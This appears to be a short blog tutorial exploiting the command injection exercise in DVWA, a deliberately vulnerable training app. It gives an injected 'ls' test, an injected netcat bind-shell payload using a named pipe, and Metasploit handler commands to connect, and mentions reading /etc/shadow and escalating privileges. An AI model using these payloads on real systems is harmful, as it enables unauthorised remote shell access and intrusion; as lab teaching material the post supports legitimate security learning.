Did you know that you can navigate the posts by swiping left and right?

Exploiting Command Injection vulnerabilities

18 Apr 2017 . category: tech . Comments
#redteam #kali #dvwa #metasploit

Command Injection is the manipulation of a vulnerable software in order to execute arbitrary commands on the host operating system. Command Injections are possible when the application skips the input validation and uses it for executing a shell command on the host operating system. in this post we’ll get our hands on DVWA’s Command Injection section, and we’ll open a backdoor on the server using Metasploit.

Visit the Command Injection section of DVWA.

ci-0

The page says that it will ping an IP address for us, so let’s see what will do for the IP 127.0.0.1:

ci-1

Now, let’s try to append a list bash command after our input IP address:


127.0.0.1; ls

ci-2

Sweet, DVWA simply appends our input to the underlying bash command!

Now, let’s listen on port 4444 using netcat and redirect all the incoming bytes to a bash shell:


127.0.0.1; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe

ci-3

As you will notice, the page is loading forever, which means that our backdoor is open and waiting for us… :smile:

Let’s start msfconsole and open the shell on the server:


⁠⁠⁠msfconsole
use exploit/multi/handler
set payload linux/x64/shell/bind_tcp
set RHOST 127.0.0.1
exploit

ci-4

Note that we didn’t set the LPORT of bind_tcp, since the default one is 4444.

As you can see, we are the www-data user, and that’s why we can’t read the /etc/shadow file, which contains the user passwords of the operating system. But, we have all the privileges that www-data user has and we can e.g. modify DVWA or escalate to root, by exploiting a local privilege escalation vulnerability.

Happy binding!


Me

Panos is a founder of two failed start-ups, has 2 approved patents and several scientific publications in first tier conferences and journals. Loves connecting business requirements with technology and building teams that deliver on time, with quality and within budget. Currently he is on a mission to modernize personal finance 🤖💰